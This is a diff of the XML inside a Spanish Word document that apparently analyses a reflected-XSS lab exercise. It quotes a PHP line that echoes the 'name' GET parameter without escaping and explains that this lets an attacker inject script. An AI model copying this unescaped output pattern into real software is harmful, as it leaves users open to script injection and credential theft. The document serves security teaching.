+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>- Vulnerab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ilidad a XSS-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>array_key_exists( "name", $_GET )</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> verifica si el parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>te código</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tiene una vulnerabilidad de seguridad grave</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a ataques XSS, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">debido a la forma en que se maneja el parámetro </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -1516,831 +2265,272 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> existe en el array </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$_GET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”, al concatenar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>la entrada del usuario en la salida</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> del código, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ningún tipo de validación o escape</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, permitiendo que u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>n atacante p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ueda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">proporcionar un valor de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">que incluya código HTML o JavaScript malicioso, lo que podría ser ejecutado </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">en </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>el navegador del usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">permitir el robo de credenciales, inyección de malware </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> otros tipos de ataques.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="35"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$_GET[ 'name' ] != NULL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> verifica si el valor del parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> no es nulo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>echo '&lt;pre&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Hello</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ' . </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$_GET[ 'name' ] . '&lt;/pre&gt;';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Si el parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> existe y no es nulo, el código dentro del bloque </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> se ejecutará. La función </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> se utiliza para imprimir una cadena de texto que incluye el valor del parámetro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>. La cadena se construye concatenando tres partes:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="36"/>
-        </w:numPr>
